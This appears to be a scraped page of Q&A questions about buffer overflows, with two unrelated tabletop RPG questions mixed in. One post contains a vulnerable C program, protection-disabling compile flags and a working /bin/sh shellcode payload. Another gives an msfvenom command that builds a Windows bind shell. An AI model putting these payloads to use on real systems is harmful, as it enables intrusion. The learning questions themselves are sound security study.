Why do we need security measure likes control flow integrity and buffer overflow guard if we have good access control protocol in place?

Reading into information security, I noticed two branches. Access control when communication with external device by using some type of cryptographic authentication and encryption mechanism and things like control flow integrity. My question is why do we need the latter if former is good enough. Are there example of control flow exploits on access control protocol implementation themselves? My focus is mainly on embedded devices.

64bit buffer overflow fails with SIGILL, cannot understand the reason

I have been doing 32bit buffer overflows for some time and I decided to try some 64bit overflows, to explore some more realistic scenarios. I have compiled my code with gcc -fno-stack-protector -z execstack -no-pie overflow.c -o Overflow.

Here is the code:

#include <stdio.h> #include <string.h> void function(char *str) {     char buffer[32];     strcpy(buffer,str);     puts(buffer); }  int main(int argc, char **argv) {     function(argv[1]); } 

Using gdb I determined how many bytes I need to write to control the return address. This is 40 bytes. So at first I tried to write 40bytes of “A” and then 6bytes of “B” to test the control of the return address.

Here is a screenshot: enter image description here

I found and tested a 23 byte shellcode that executes “/bin/sh”, so I try to write a nop-sled of 13 bytes, the shellcode and the first 6 bytes of the return address that need to change. So I come up with this (in gdb):

r $  (python -c'print "\x90"*13+"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"+"\x10\xe1\xff\xff\xff\x7f"') 

I have set 2 breakpoints before and after the execution of strcpy and examine the memory.

This is the stack before the strcpy: enter image description here

where at address 0x00007fffffffe138 is the return address of function function enter image description here

And this is the stack right after the strcpy execution: enter image description here

So in my understanding, after I press c to continue the execution, I must “return” to the nopsled and then execute the shellcode in gdb.

Instead I get a SIGILL, for illegal instruction.

enter image description here

I cannot figure out why this is happening, any help/suggestions/pointer would be much appreciated.

How Could a Buffer Overflow be Used to Execute Code? [duplicate]

This question already has an answer here:

  • What is a buffer overflow? 5 answers

I’ve heard a lot about buffer overflows, and I understand the basic concept, but I would like to know exactly how buffer overflow vulnerabilities are used to execute code? Because, if an attacker were trying to exploit a buffer overflow vulnerability on a website I had made, how would they know when they had reached the end of the buffer and they were now entering things into the memory layer where code would be run.

How do we secure image parsing libraries against buffer overflow?

New to buffer overflow through image parsing. How can one design a secure library that parses images, and ensure there are no security vulnerabilities in it? It is common knowledge that image parsing libraries are vulnerable to Buffer Overflow, so I would appreciate it if someone could specifically explain how to secure image parsing libraries against buffer overflow.

In Buffer overflow exploitation what if JMP ESP address contains bad characters?

I was writing an exploit for BOF. The server accepts only ASCII payloads. FInally I wnted to jump to my shellcode which is clearly in the stack. But only one module is available without ASLR and DEP which has address starting from 56566577. I got JUMP ESP, suppose in 5757578E, this doesn’t work. Becuase the 0x8E outside the scope of ASCII 0x00 to 0x7F. Consider no other register has the shellcode. How can I deal with certain situations?

To create ASCII shellcode I use below:

msfvenom -p windows/shell_bind_tcp -a x86 -f perl --platform windows LHOST= LPORT=8181 -b "\x00" EXITFUNC=seh -e x86/alpha_upper 

But this also has character above 0x7F. How can I generate shellcode within 0x00 – 0x7F.

Can some one please explain what is meant by “5 level lower” with Kineticist Archetype Elemental Purist’s Limited Buffer feature?

Can some one please explain what is meant by “5 levels lower” with Kineticist Archetype Elemental Purist’s Limited Buffer feature?

So far I get that you just get it and it benefits later at level 11. Isn’t it?

Reverse engineering and buffer overflows: zero to hero

When I do CTFs, I can usually cope well with and understanding everything pretty much apart from buffer overflows, binary exploitation and reverse engineering

Almost to the point that I would consider myself having zero knowledge at all. I grasp the concept at the very most basic of levels and by that I mean I can operate a mouse and keyboard

Is there anywhere that takes you from zero to hero? I’m currently doing CTFs on https://0x0539.net/ and have done most of them apart from reverse engineering ones.

https://liveoverflow.com/ is a decent start I believe but was wondering where there was a book, an online resource that as I say, could take me from zero to hero

I understand there’s a “stack” and “memory” and “assembly language” and then after that… nothing.

Specifically – I would like to get to a point where I come across a related challenge in a CTF and at least know where to start, where to go and how to complete it


Buffer Overflow with pwntools

I was studying the Buffer Overflow vulnerability and there was a small task to complete. I am very new to these kind of things and was unable to solve it beyond some point. The program has a char[120] but is bounded by the read() command. Can anyone explain me or help me out a little bit with the problem? I have attached the binary as well as the complete C code.

C Program

Binary file

I have to exploit it only using pwntools, so it would be grateful if you could explain me something related to that.

Thanking you in advance!

Does a Buffer Overflow vulnerability always mean a code execution vulnerability?

Since Buffer Overflows always let an evil hacker to write outside the buffer and overwrite the return pointer to a shellcode the evil hacker can place, does it mean that a successful exploitation of a Stack Buffer Overflow always mean the ability to invoke a shell if done the right way? At least in theory, if you assume that DEP and ASLR is not in place.

Can I regain some of my normal hit points while I have a buffer of temporary hit points?

If my character has 50 hp, loses 20 hp, and I then cast a 25 thp armor of agathys, what happens if I’m using something like Grim Harvest, Vampiric Touch or Enervation, each of which restore normal hp?

Obviously my pool of normal hp is depleted, do these spells replenish that even if I have a thp buffer on top?